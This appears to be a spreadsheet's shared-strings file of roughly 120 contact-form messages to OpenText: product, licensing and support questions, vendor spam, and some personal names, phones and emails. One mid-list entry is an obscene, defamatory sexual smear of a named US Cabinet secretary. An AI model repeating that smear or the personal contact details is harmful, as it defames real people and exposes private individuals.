  <si>
    <t>Need syntax for Exceed On Demand xStart command. Need to open a Linux xterm window and execute a script. Can't find an example of this.</t>
  </si>
  <si>
    <t>Can't open drawing.  Says "invalid licence".  What to do ?</t>
  </si>
  <si>
    <t>Leidos is conducting an Analysis of Alternatives for our eDiscovery and remote live forensics services.  Please provide an email address for the requisite documentation so that we may be able to include what you have to offer in our process.</t>
  </si>
  <si>
    <t xml:space="preserve">You need to be authorized to use this service._x000D_
Authentication failed. Will not allow me to send a FAX&gt;_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon,_x000D_
_x000D_
I am not sure you are the right contacts to reach out to, but Georg Jensen has recently added new prefixes to our UPC barcodes and we need this to be updated in your system, in order to fill out the GTIN/UPC portion of the GXS catalog.   Can you let us know what the proper procedure is or can you please forward us to the correct contact.  We appreciate any help in resolving this issue._x000D_
_x000D_
Network ID: GE867_x000D_
User ID: GE867A_x000D_
_x000D_
Thank You._x000D_
 _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Open Text,_x000D_
 _x000D_
I am writing to you to introduce Be Organic 2, S.R.L. latest project, The Ocean Tower Free Zone Park, as a possible location for your company. Strategically located in the city center of Sosua, Dominican Republic. The Ocean Tower is the first of its kind in the country; it´s aimed directly and designed exclusively to serve the requirements and necessities of the service industry. Being a Free Zone Park, companies running in The Ocean Tower will be completely exempt from import duties, corporate income taxes, construction taxes, etc._x000D_
 _x000D_
We believe our office spaces will be more than adequate for your company. The Ocean Tower offers different spaces at competitive prices according to our clients´ needs. _x000D_
 _x000D_
Another of its advantage is our location. Sosua offers an envious lifestyle with world famous beaches, an international night life, extreme sports, and more.  _x000D_
_x000D_
If you have any further questions do not hesitate to contact us or come visit our facilities at Calle Bruno Philipp, Esq. 16 de Agosto, El Batey Sosua (In front of Gasenvoort Playa Imbert).  _x000D_
 _x000D_
Best regards,_x000D_
 _x000D_
Leticia Irusta_x000D_
 _x000D_
+1 (829) 875-9679_x000D_
Director of Operations_x000D_
The Ocean Tower_x000D_
www.oceantowerfreezone.com_x000D_
</t>
  </si>
  <si>
    <t>RFQ# 172711 DUE 5/11/2017 I NEED A SALES EMAIL IN ORDER TO SEND AN AIR FORCE REQUEST FOR QUOTE. PLEASE REFERENCE THE RFQ NUMBER IN THE SUBJECT LINE. OPENTEXT PDF FORMS AND ADLIB EXPRESS MAINTENANCE RENEWAL</t>
  </si>
  <si>
    <t>Would like to know more about InfoArchive</t>
  </si>
  <si>
    <t>Hello, I was able to use the knowledge base and implement a proof of concept where my app submits and checks the status of the fax.  I was trying to get information on how to implement a POC where the user can send in a fax to rightfax and that is returned to us through an API or email.  Thanks.</t>
  </si>
  <si>
    <t>I'm trying to purchase Brava Reader but it keeps rejecting my expiration date for my card. Please call me.</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Fax in FCS conversion - faxes not being sent._x000D_
OS: Microsoft Windows Windows 7 Professional, Version 6.1, Build 7601_x000D_
  Service Pack 1_x000D_
  Windows type: Workstation_x000D_
RFAPI Version 10.6.2.951 Process Default Language, built 7/23/2015 11:00 AM_x000D_
  C:\Program Files (x86)\RightFax\Shared Files\RFWIN32.dll</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
I am reaching out to check whether you have any need of key decision makers from Application Architecture, Development &amp; Integration sector. We are B2B contact providers. We can provide complete contact details and verified email addresses of:_x000D_
_x000D_
Architects: Enterprise/Solution/Application/Business/Technical/Information _x000D_
_x000D_
Applications: Architecture/Development/Integration Leaders/Portfolio Management, Program Manager, Application Lifecycle Management_x000D_
_x000D_
IT: Senior IT and Business executives, CIOs, CTOs, Web Services and Infrastructure Managers, IT Leaders (cloud and SOA), IT Leaders (application strategies), IT Leaders (mobile)_x000D_
_x000D_
Let me know the specific Industry/Geography/Job titles you want to target, I will send you few samples, counts and pricing for your reference._x000D_
_x000D_
I’m looking forward to working with you._x000D_
_x000D_
Regards,_x000D_
Diana Anderson | Marketing Manager_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I’m looking to speak to someone to discuss documentum.  Webair is a enterprise private cloud company with facilities in NY, LA, Montreal, and Amsterdam. We are heavily focused on healthcare IT and documentum has come up a few times in conversations with hospitals/healthcare customers and our ability to provide it securely/privately. We'd like to learn more how we can do that.. </t>
  </si>
  <si>
    <t>Hi!_x000D_
_x000D_
Please I want to know how can I get the full version of IHub, I want to have it and I want to know how much does it cost, thank you and I'm waiting for your answer.</t>
  </si>
  <si>
    <t>Altasciences is currently looking a vendor for eTMF services and your company was identified as a potential vendor. In order to get more information about the provided services, a Request For Information was prepared.  If you are interested to provide this service to Altasciences, could you send us a valid email address where we can send the questionnaire? The responses would need to be returned at the latest on 2017/05/15. Following the evaluation of the answers, the operations will determine if they want to move forward. If you have any questions, please contact Natasha Savoie, Associate Director Corporate QA (nsavoie@algopharm.com / mobile 514 297-5203).</t>
  </si>
  <si>
    <t>_x000D_
We have a license from Centura Team Developer, and the local vendor in Brazil (TRIAD) has informed us that it is no longer your reseller._x000D_
We need to know if our Centura Team Developer license is OK._x000D_
What do I need to submit to validate our license?_x000D_
Contact by email is preferred.</t>
  </si>
  <si>
    <t>Additional Quickscan Pro 4.71.0 license</t>
  </si>
  <si>
    <t>We've just become a trading partner of JCPenny, and prior to beginning EDI testing, have been asked to verify our Comm Qualifier and Sender/Receiver ID have been setup for all JCPenny ID's._x000D_
Caulfeild's ID is 01 / 201616703 and we will be communication with  the following JCPenny ID's:_x000D_
08 / 6111355006_x000D_
08 / 6111355004_x000D_
08 / 6111355004_x000D_
_x000D_
Can you advise if this has been set up, and what sort of testing to we need to do, to confirm they are working._x000D_
Regards,_x000D_
George</t>
  </si>
  <si>
    <t xml:space="preserve">Our agency is currently designing a website for one of your FirstClass clients, a dance studio called My Dance Hub out of Aurora, IL. We are going to be designing their website on Wordpress and were wondering if there is a front-end component to FirstClass that we can put in the website, especially for scheduling? Thanks. </t>
  </si>
  <si>
    <t>What is contract length of Desktop DX-P?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is John Reilly and I am the Manager of Regulatory Affairs at Sterilex.  We are currently looking to transition our paper document change control process into an electronic tracking and archive system.  We sell products that are regulated by the EPA and may be regulated by the FDA in the future.  This system would need to meet the documentation standards for both regulatory bodies.  Could a member of your team contact me for a further discussion?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
John Reilly</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a watermark solution that will work on any document type from MS work to PDF/s.   Documentum is the repository for the document .  It needs to be un-editable once applied  to the document. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">kindly we have received this scope of work from our client (The Consultant shall be required to develop all functionality within the Open Text Livelink_x000D_
platform to support full Enterprise Content Management / Electronic Document Management_x000D_
and Control. This shall include but not be limited to commercially developed “plug and play”_x000D_
modules and custom-developed automated workflows including built in forms and/or links to_x000D_
other EPMS databases for automated data extraction. The Consultant shall be provided with an_x000D_
Open Text Workspace. All set-up and configuration to achieve a fully functioning and usable_x000D_
system shall be the responsibility of the Consultant._x000D_
Abu Dhabi Airports Company PJSC Scope of Services_x000D_
Contract: Project Management Consultancy for Critical Projects Page 15 of 38_x000D_
Contract No.: AUH.04.17.0637 April 2017_x000D_
The Consultant shall be required to:_x000D_
1 The Consultant shall be responsible for identifying the required number of licenses_x000D_
for Open Text Livelink and Causeway EConsultant modules (such as IFORMS). All_x000D_
licences shall be procured directly by the Employer, without cost to the Consultant._x000D_
2 The Consultant shall be responsible for procuring all training at their cost with_x000D_
regards to Open Text Livelink and Causeway EConsultant in order to ensure_x000D_
adequate proficiency on the referenced systems for the Consultant personnel. In_x000D_
addition, this shall include continuous training throughout the life cycle)so please end quotation regarding to your understand from this scope </t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning,_x000D_
_x000D_
I noticed that Open Text uses the short code 30939 for SMS messaging.  I’m not sure who your current provider is, however would you be interested in better pricing, more reliable service, top notch 24/7 365 live emergency tech support, etc.?_x000D_
_x000D_
This is for both long and short codes, as well as our automated phone broadcast service._x000D_
_x000D_
_x000D_
If you are interested in saving some money and getting far more valuable and reliable service, please let me know…I know for a fact that we can offer you a lower price point for a better product._x000D_
_x000D_
_x000D_
Thank you in advance._x000D_
_x000D_
_x000D_
Best,_x000D_
_x000D_
Zach Van Way_x000D_
Sales Manager_x000D_
CDYNE Corporation_x000D_
757-544-9510 ext 3157 (main)_x000D_
757-553-4271 (cell)_x000D_
757-361-0018 (fax)_x000D_
www.cdyne.com_x000D_
_x000D_
Deloitte’s Technology Fast 500™ - #158 (2013) and #197 (2014)_x000D_
_x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Can you give me a quote please for the Brava Reader software</t>
  </si>
  <si>
    <t>Hi there,_x000D_
_x000D_
I'm reaching out to ask if there is a senior executive at OpenText that would like to provide insight for a B2B Marketing blog post on digital asset management._x000D_
_x000D_
The idea behind the article is to explore what it is and why marketers should implement their own DAM solutions._x000D_
_x000D_
Does this sound of interest? If so, I'd be happy to send you a more detailed brief, together with relevant questions to answer._x000D_
_x000D_
I look forward to your email._x000D_
_x000D_
Kind regards,_x000D_
Michael.</t>
  </si>
  <si>
    <t xml:space="preserve">Need to schedule a demo around OpenText Email Archiving for Office 365. </t>
  </si>
  <si>
    <t>We use the SAP rightfax connector. How do we track outbound faxes from SAP within rightfax to validate the went out?</t>
  </si>
  <si>
    <t>requirement for Right fax Enterprise version 10.6.0.330</t>
  </si>
  <si>
    <t>Request for open text content server installation files</t>
  </si>
  <si>
    <t>interested in case management solution</t>
  </si>
  <si>
    <t xml:space="preserve">Need to get more information on Documentum platform. </t>
  </si>
  <si>
    <t xml:space="preserve">I Use 5 users SQLB612  on Win XP for many years, if I upgrade to Win 10 , which version of SQLBase is Appropriate for me ? </t>
  </si>
  <si>
    <t>Hello, I am looking for next course in Open Text Workflow design in English. Earlier I have seen a planned course in Holland in June 2017 - is that still possible to register for this course?_x000D_
thanks for a reply, M.Meissner</t>
  </si>
  <si>
    <t>I would like to be your partner or value add reseller of your software.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Kindly share the best lowest price &amp; delivery lead time._x000D_
_x000D_
Right fax Enterprise version 10.6.0.330_x000D_
</t>
  </si>
  <si>
    <t>I would like to get the technical specifications for Opentext Extended ECM system to check whether it can satisfy our requirements. Can you please send that across so I can match up with our requirements?</t>
  </si>
  <si>
    <t>Sales team please contact me</t>
  </si>
  <si>
    <t>Information about brava or other software that can be used to keep files updated</t>
  </si>
  <si>
    <t>To enquire about my organsation's End User Code</t>
  </si>
  <si>
    <t>Sales Inquiry on Open Text. URGENT. I tried your Kuala Lumpur office but your phone is not working</t>
  </si>
  <si>
    <t>Ich interessiere mich für Open Text CC Professinal aka Teamsite und Zertifizierungsmöglichkeiten und Kosten für etwaige Zertfizierung.</t>
  </si>
  <si>
    <t>I have been emailing Kevin Cordeiro in relation to obtaining a letter from OpenText's legal counsel concerning the agreed cessastion of use of WebRenderer software (previously licensed by Dell/EMC). I have not received a response after 3 repeated attempts to contact him since February and we require a legal letter to advise that Opentext have withdrawn the use of WebRenderer software in their products. Please contact me on the email above or via phone to discuss as soon as possible. _x000D_
_x000D_
Note if the software is being deployed, it has been done so unlawfully and outside a current license agreement. This requires immediate rectification._x000D_
_x000D_
Your earliest response is required._x000D_
_x000D_
Nicole Chesterman</t>
  </si>
  <si>
    <t>Interested in implementing a Contract Management System and wish to find out more information about OpenText</t>
  </si>
  <si>
    <t>Hi Open text,_x000D_
_x000D_
We currently use your product Free DWG Viewer in out Citrix\Terminal Server environment. We have noticed that you will no longer be offering the free version in the future. We would like to discuss licensing\cost of installing the full DWG Vierwer? Some questions are how you you license the product user\computer, what licensing do you offer for Citrix\Terminal server environments?_x000D_
_x000D_
Regards,_x000D_
_x000D_
Nick Gilchrist_x000D_
City of Greater Geelong</t>
  </si>
  <si>
    <t>Good Day,_x000D_
_x000D_
I wanted to apply to a job, but I cannot login to careers_x000D_
_x000D_
I received a message that an email would be sent to me, providing a new password... but the email never arrived, nor is it in my junk mail folder.</t>
  </si>
  <si>
    <t>To understand your document right management product whether is it what I am looking for?</t>
  </si>
  <si>
    <t>I have a client and I have not been able to resolve their support issue. They have been using TeleForm for many years and they export data to SPSS. Now, a form that has been working stopped working giving them an error:</t>
  </si>
  <si>
    <t>We are a consulting company with a Content Management opportunity in the financial sector among our customers.  We'll like to evaluate your Documentum platform to validate it meets our customer needs and understand better the business value it provides vs license/implementation costs_x000D_
_x000D_
Please contact me directly._x000D_
Thanks.</t>
  </si>
  <si>
    <t>The Secretary of Transportation of the US Elaine L. Chao is the cheapest whore in the world! Elaine L. Chao's ass hole is too dirty to fuck! But every time you fuck her, she pays you 1000 bucks! _x000D_
Kissinger slept with her because she is much richer than his wife.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
I am participating in a solution review for a case management / business process management system. At this point we do not have authority to make an acquisition and are collecting information to inform a future acquisition strategy. We are interested in finding out more information on your solution._x000D_
_x000D_
Thanks,_x000D_
Matt_x000D_
</t>
  </si>
  <si>
    <t>Link not working on website._x000D_
_x000D_
http://www.opentext.com/2/global/sso_download_open?docpath=/corporate/customer/casestudy/pacific-gas-success-story.pdf</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
If you’re looking for an outsourcing partner, we’ll be happy to become a prospective partner with your company. Our extensive services involve Web Design and Development, SEO, and Digital Marketing. We look forward to have a brief conversation to discuss further._x000D_
_x000D_
SEO starting @ $99/Month_x000D_
Web Design starting @ $299_x000D_
_x000D_
Thanks_x000D_
Audrey_x000D_
Skype: ranksindia_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen einer Seminararbeit an der Frankfurt School of Finance and Management muss ich über die Herausforderungen und Erfolgsfaktoren bei der Implementierung von Enterprise Content Management Systemen schreiben. Da Sie einer der größten Anbieter hierfür sind, wollt ich nachfragen, ob Sie mir Informationen/Lessons Learned oder ähnliches über die Herausforderungen und Erfolgsfaktoren hierfür zur Verfügung stellen können. Falls Sie noch weitere Fragen  hierzu haben, kontaktieren Sie mich bitte._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Selina Meiser</t>
  </si>
  <si>
    <t>I am looking for new My Support contract._x000D_
Kindly let me know the price and procedure to do that.</t>
  </si>
  <si>
    <t>I don't have a user account.  My co-worker, Silvana Della Camera, who does is on vacation for two weeks.  We are moving our applications to a new box.  I need new keys for that purpose.  I tried to create a user account - twice - but it doesn't tell me what the error is so I can't correct it._x000D_
I hit submit, but this screen is still here, so I will hit it again.  If you get a duplicate request, you'll know why.</t>
  </si>
  <si>
    <t>I don't have a user account.  My co-worker, Silvana Della Camera, who does is on vacation for two weeks.  We are moving our applications to a new box.  I need new keys for that purpose.  I tried to create a user account - twice - but it doesn't tell me what the error is so I can't correct it.</t>
  </si>
  <si>
    <t>We have an existing SUID and purchased additional channel licenses (that came with a new SUID) that we need to have added/merged to our existing RightFax installation.  Who can help resolve this issue for us?</t>
  </si>
  <si>
    <t>Request for quote  ( we are reseller and sell to Government)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we are a computer VAR and work with government. Our customer in Illinois asked us for pricing on the following. Would someone be able to work with us?_x000D_
Annual maintenance by Open Text.  License number R112902-000 (7/01/2017 – 6/30/18)	_x000D_
Exceed 2008 part # EXMPI550701M0000Z	100_x000D_
Connectivity Secure Shell 2008 part # SPMPI570701M0000Z	100_x000D_
Note: maintenance provides for software upgrades, patches, and 12x5 technical support via phone and 24x7 technical support via web.	_x000D_
</t>
  </si>
  <si>
    <t>We have Exceed 14.  Does that function on Windows 10 64 bit?</t>
  </si>
  <si>
    <t xml:space="preserve">Can't get Brava! Desktop to work. When I select license key, I get the following:  OpenText Connect  No Access_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Need to find our login/password for the Hurley Retail account for the OpenText Active Catalogue </t>
  </si>
  <si>
    <t xml:space="preserve">New opportunity for ePermit management along with Enterprise Content Management (ECM) </t>
  </si>
  <si>
    <t>Im looking for information on the trainers for the OpenText Analytics Workshop in Washington, D.C. that is taking place 5/10/2017._x000D_
Is it possible to get the email addresses for Dan Melcher and Geff Vitale, so I can reach them directly? Thanks</t>
  </si>
  <si>
    <t>I am requesting access to the OpenText knowledge base for SAP solution extensions (master guide, installation guide) in order to sell these solutions to my customers.</t>
  </si>
  <si>
    <t>We are in the early stages of reviewing our need for a document management platform and would welcome a discussion about what OpenText could offer us.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently sent an email to Christopher Tedesco who was the last contact I have for purchasing licenses for Bizmanager AS2 but I have not had any response from him. I need to get current prcing for a trading partner license and I also need to purchase it asap._x000D_
_x000D_
Regards,_x000D_
Jeff Aldi_x000D_
</t>
  </si>
  <si>
    <t>Hello! My name is Angelina, and I’m in charge of PR and marketing at Quantum Digital Marketing Agency. I have been tasked by our CEO with finding SaaS products for which we can be resellers. We will give priority to companies with online training for clients. I’m not referring to FAQ or Knowledge Base; I mean Academies. For example:_x000D_
_x000D_
1. http://academy.serpstat.com/ — AcademyOcean was used to create this Academy (https://academyocean.com/) _x000D_
2. https://www.incapsula.com/about/university.html — Custom-built site_x000D_
_x000D_
FAQ and KB answer the question “How do I use this service?” An Academy, on the other hand, first answers the question “Why should I use this service?” Only afterwards does it answer the question “How?” Does OpenText have an Academy? If not, can you create one for our clients? In doing so, we will be able to attract more clients. The interactive education increases their loyalty._x000D_
_x000D_
Thanks, _x000D_
Angelina</t>
  </si>
  <si>
    <t>Hi, I want information about your products.</t>
  </si>
  <si>
    <t>Hi, is there a Brava Version for SharePoint 2016? Thanks in advance.</t>
  </si>
  <si>
    <t>Hello, could you please share a price details for the iHUB?_x000D_
_x000D_
Thank you!_x000D_
_x000D_
Kind regards,_x000D_
Michael</t>
  </si>
  <si>
    <t>Open Text Solutions Demo_x000D_
Enterprise Content Management (ECM) and more.</t>
  </si>
  <si>
    <t>Attend the conference Data Structures-2017 http://datastructures.conferenceseries.com/</t>
  </si>
  <si>
    <t>I HAVE BUY THE Brava! Desktop DXP AND NOW I TRY TO FOLLOW THE STEPS AS BELOW   	_x000D_
    Click on Accounts on the Top Menu_x000D_
    Select Activations/Keys_x000D_
    On the Product Activation Page Search for your IGC PIN_x000D_
    Click on the Produce License Key icon_x000D_
    Enter Required information to generate Key_x000D_
    Click Submit_x000D_
    Click Download File to obtain your License File_x000D_
    Open zip file and save IGCKey.lic to a retrievable location (i.e. Desktop)._x000D_
_x000D_
AND THEN IT ALWAYS SHOW THE PAGE_x000D_
https://login.opentext.com/connect/sso_controller-profile?sys_action=sso_noperms_kc_css_x000D_
_x000D_
IS THERE ANYONE CAN HELP ME FOR THIS</t>
  </si>
  <si>
    <t>i need info</t>
  </si>
  <si>
    <t>Hi I am interested in a Crash Course in Exstream Development. Do you provide this training? How is it delivered? Is it online training? How long does it go for? How much does it cost? Can you send me more details about the course?</t>
  </si>
  <si>
    <t>i want to know the  brave desktop license.</t>
  </si>
  <si>
    <t>Composer Notes claims: "Business logic is converted to C# classes and methods, all managed using Visual Studio .Net"_x000D_
_x000D_
What level of Notes programming complexity is NOT fully converted? I.e., what is left for the developer to do in C# for a complex workflow app? Does it automatically convert LotusScript and Formula code for prompts, picklists, dblookups, etc., to fully working C#?_x000D_
_x000D_
Please send any white papers or more detailed info. I'm presenting a session at Engage2017 Monday regarding migrating Notes applications to other platforms, including SharePoint, and want to mention Composer Notes, which I just learned of today during my research. Would need to know the product's strengths/focus, high level architecture, and general pricing model._x000D_
_x000D_
Thank you,_x000D_
Jamie</t>
  </si>
  <si>
    <t xml:space="preserve">Trying to find training for Xpressions. Anthem Life uses this to produce its certificates but the only expert suddenly left the company. I am looking for training on creating/expiring/editing text pieces, setting up documents and such. Do you have training classes for beginners? </t>
  </si>
  <si>
    <t>I would like to partner your company on your ecm. may you please guide me through the process as well as requirements many customers are requesting ecm and i want to take advantage of opportunity</t>
  </si>
  <si>
    <t>Hi,_x000D_
We use GXS - do we have a support contract? PA &amp; SC Steens Ltd</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I hope you are the right person to discuss about the Energy and energy management industry database._x000D_
_x000D_
Which includes complete contact details and verified email addresses of Director, CEO CTO, COO, CFO, director of network operations, VP/director of asset management, VP or director of construction, engineering or outside plant, engineering manager, network engineer, network designer, procurement manager and many more._x000D_
_x000D_
Kindly let me know your target criteria so that i can provide you few free samples,counts and cost for your reference:_x000D_
_x000D_
Target Title:_x000D_
Target Industry: _x000D_
Target Geography:_x000D_
_x000D_
Look forward to hear from you._x000D_
_x000D_
Best Regards,_x000D_
Claudia Rose	_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
I am looking to redact all contact information (email, address, telephone, mobile etc) from CV's in an automated manner for serving previews in our CV Search application. It looks like this is something your product offers but could you confirm this._x000D_
_x000D_
I am also interested in a saas or remote platform for doing this if this is something you offer._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I was attempting to register my report builder after new PC build but the previous web pages no longer exist. How do I go about re-registering my product?_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>We are having difficulties configuring Exceed to be used on a single machine when different users log in. Each time a new user logs in, the configuration is lost and they need to re-configure it. We'd like to find a way to have a blanket configuration across multiple machines and users.</t>
  </si>
  <si>
    <t>complaint regarding fax not going through. I have fax confirmation pages showing "no answer" please email me so I can send them to you</t>
  </si>
  <si>
    <t>Questions regarding Redact-It software._x000D_
_x000D_
Hello, we are currently using Redact-It during a free trial period to assess whether or not the software will meet our redaction. We have a few specific (and more technical) questions about capabilities and how to perform certain commands. Is there someone I can speak with about it?_x000D_
Thank you.</t>
  </si>
  <si>
    <t>conhecer a solução de DAM que voces possuem.</t>
  </si>
  <si>
    <t>Exploring options for a fax and documnrt management solution for our healthcare clients</t>
  </si>
  <si>
    <t>Can not log in to Active Catalogue</t>
  </si>
  <si>
    <t>Our free reader has stopped reading our Social Security image files. When attempting to download and reinstall, it appears to be a limited trial version only. Is the free image reader no longer free?</t>
  </si>
  <si>
    <t>We are a small (13 person) design firm in Round Rock, Texas ._x000D_
We are looking for a cost effective solution to our information organization for projects and in house. We need efficient file saving,  file retrieval, email filing, task assignment and tracking and perhaps workflow process management. We use AutoCAD and Revit software for our design files, Microsoft Office and Adobe for graphics and marketing._x000D_
Not sure of the costs of your solution but I thought I'd ask._x000D_
Thanks_x000D_
Philip</t>
  </si>
  <si>
    <t>Our current fax appliance is the OpenText Fax Appliance A104 - 4 Line . Looking to get a suggestion/quote on an updated product from this same line as the product is getting aged. The fax appliance also requires silverlight which is not being supported by many browsers/applications recently.</t>
  </si>
  <si>
    <t>We currently use eFax for our global solution to receive faxes and have some performance reliability issues with the solution so we are looking to find alternate cloud fax providers with local numbers in various countries (Europe, US, Australia, Brazil, and a few other locations).  I would like to have a conversation with OpenText on the Rightful solutions.  Currently, we need a PDF via email but may be looking at other integrations via GHX as well direct fax to a penumbrainc.com email so would also like to understand routing options as well._x000D_
_x000D_
Look forward to talking with you.  I am OOO Thursday 04-May and 08-May to 11-May mid-day.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I hope you are the right person to discuss about updated Database from all the industries. _x000D_
_x000D_
We have the complete contact details and verified email addresses of CEOs, Purchasing manager, Procurement managers, Chief development officers, Presidents, Directors and all manner of people from various industries who might be interested in your product/services._x000D_
_x000D_
Antique Stores, Apparel Stores, Architect / Contractor / Builder / Developer, Bookstores, Buying Groups, Chain Stores, Contract Hospitality, Decorative Accessory Stores, Department Stores, Drug Stores / Pharmacy, Exporters / Distributors, Floor Coverings Stores, Florists, Furniture Stores, Galleries / Museums, Gift / Lifestyle, Home Improvement Centers / Hardware Stores, Hospital Gift Shops, Hotels / Resorts, Interior Designers, Internet / Catalogs, Internet Retailers, Juvenile / Toy Stores, Lighting Showrooms, Mass Merchants / Off-Price, Mattress Stores, Nurseries / Garden Centers, Office Supply / Stationers, Spas / Salons, Specialty Gourmet / Grocers, Stationery / Paper Goods._x000D_
_x000D_
Let me know your target criteria/market like:_x000D_
_x000D_
Target Industry:_x000D_
Target Job title:_x000D_
Target Geography:_x000D_
_x000D_
Look Forward for your response._x000D_
_x000D_
Regards,_x000D_
_x000D_
Stephen Hunt_x000D_
Marketing Manager_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Based on your company profile, we have developed an extensive database of following technologies users with opt-in emails, telephone numbers and other details._x000D_
_x000D_
Own the data in excel file for unlimited usages: _x000D_
_x000D_
1. TECHNOLOGY USERS:- SAP, Sage, Supply Chain Management Software(SCM), Business Intelligence Software(BI), MS Users, Oracle, ERP, CRM, Accounting Software,Citrix, Avaya, Cisco etc._x000D_
_x000D_
2. CRM USERS LIST:- Sage CRM, MS Dynamic CRM, MS Exchange Server, Siebel, SAP CRM, Sales force, IBM Lotus, Goldmine, Sage Saleslogix etc. _x000D_
_x000D_
3. Microsoft Customers/partners list, IBM Customers/partners List, Oracle Customers/partners List, SAP Customers/partners List. _x000D_
_x000D_
Job Level - C-Level/VP/Director/Manager and others as per criteria._x000D_
_x000D_
Kindly let me know your target criteria so that we can provide free samples and other details for your review:_x000D_
_x000D_
Target Industry:_x000D_
Target Geography:_x000D_
Target Job Title:_x000D_
_x000D_
Look forward to hear from you soon. _x000D_
_x000D_
Regards,_x000D_
Amber Winters_x000D_
Marketing manager</t>
  </si>
  <si>
    <t>Hello, we have been dealing with acct mgr. Michael Melencion &lt;mmelenci@opentext.com&gt;. We have sent him all the paper work to get the name changed from First Source to Haworth Inc on 2/22/17. I have sent him an email and spoken to customer service every month since. To no avail and the name still has not been corrected. I would like to file a complaint._x000D_
Thanks._x000D_
Kimberly Kennedy</t>
  </si>
  <si>
    <t>Juan Carlos Carranza</t>
  </si>
  <si>
    <t xml:space="preserve">Liebes OpenText Team,_x000D_
ich war bei der OpenText Innovation Tour angemelden, doch leider konnte ich wegen eines Unfalls nicht teilnehmen._x000D_
Darf ich sie um einen Zugang für CORE bitte, um mir die Präsentationen anzusehen._x000D_
_x000D_
Besten Dank im Voraus!_x000D_
_x000D_
LG_x000D_
Martin Steinberger_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir / Madam_x000D_
I am reaching out to you from the sourcing group here at Avon Products Inc. We were notified that your GLOBAL EXCHANGE SERVICE record within our system is not complete. Please send back an updated email address so we can forward you the questionnaire. This questionnaire is an important step for keeping your company active in our data base. If you have any questions or concerns feel free to reach out to me. Thank you for your time and patients._x000D_
_x000D_
Thank you, _x000D_
The Sourcing Team_x000D_
Tracyann Henry _x000D_
</t>
  </si>
  <si>
    <t>If there isany requirement for UI developer. Kindly give me an oppurtunity.</t>
  </si>
  <si>
    <t>We need a data management system, I would like more information please.</t>
  </si>
  <si>
    <t>Dears,_x000D_
I have installed the BIRT ihub successfully and i Need to have an activation code in order to launch it._x000D_
_x000D_
Regards,_x000D_
Dani.</t>
  </si>
  <si>
    <t>Hello, I would like to introduce you our FinTach project. We have collected 101% on US crowdfunding platform. And we would like to collaborate with you as our investors. _x000D_
https://www.crowdfunder.com/Onplace/invest _x000D_
_x000D_
Thank you for your time.</t>
  </si>
  <si>
    <t>Humana is on a Documentum platform and we are planning next year for a potential replacement.  I'd like to hear from someone at OT about your roadmap and future options for Documentum customers.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,My organization in moving to content server 16 and I am doing an analysis on the impact and prepare a business case for the upgrade from content server 10.5. I am particularly interested in obtaining information of the records management module, I currently manage this part in content server 10.5 and I would like to see the look and feel of this module content server 16. _x000D_
thanks  </t>
  </si>
  <si>
    <t>Dear OpentText Managesr,_x000D_
_x000D_
I am a professor and IT counsultant and I have a cleint that needs a content managment system in Saudi Arabia. I am seeking long term parternership in addition to implementing this system. In other words, we could serve as your reseller or partner in Saudi Arabia. Please contact me. It is a win win partenership</t>
  </si>
  <si>
    <t>Previous Employment verification. I was employed with EMC Corporation's ECD Consulting department at Bangalore location. Employee Id: 141875</t>
  </si>
  <si>
    <t>Want to find more information about the BIRT reports community edition .</t>
  </si>
  <si>
    <t>Looking for an OEM reporting engine for a customer. Need more information about pricing, licensing and more detailed product information. Would be great to talk to someone about it.</t>
  </si>
  <si>
    <t>I would like to request for quotation for Brava fo MS SharePoint which enables us to do below features:_x000D_
1. Annotations_x000D_
2. DRM control_x000D_
3. Redaction</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo, ich suche "BIRT iHub F-Type"... gibt es die nicht mehr? Lande immer auf Ihrer Trial Version. </t>
  </si>
  <si>
    <t>I HAVE BEEN LOGIN  AND WANT TO INSTALL WHAT I JUST BUY THE BRAVA DWGVIEWER 16.2 DXP  BUT ALWAYS SHOW THE INFORMATION AS BELOW_x000D_
We're sorry, your account does not grant you access to this resource.</t>
  </si>
  <si>
    <t>i need product of global 360 information, can you give me a connection phone or company in Taiwan?Thanks!!</t>
  </si>
  <si>
    <t>Urgent Price offer</t>
  </si>
  <si>
    <t>Buenos días, quisiera hablar con alguien que me pueda asesorar en para la adquisición de licencias de uso de brava reader._x000D_
_x000D_
En principio, necesitaríamos entre 5 o 10 licencias._x000D_
_x000D_
¿Que coste tienen?, no me entero bien de los tipos de licencia que hay en vuestra web..._x000D_
_x000D_
Por favor, llamadme cuando podais. Gracias.</t>
  </si>
  <si>
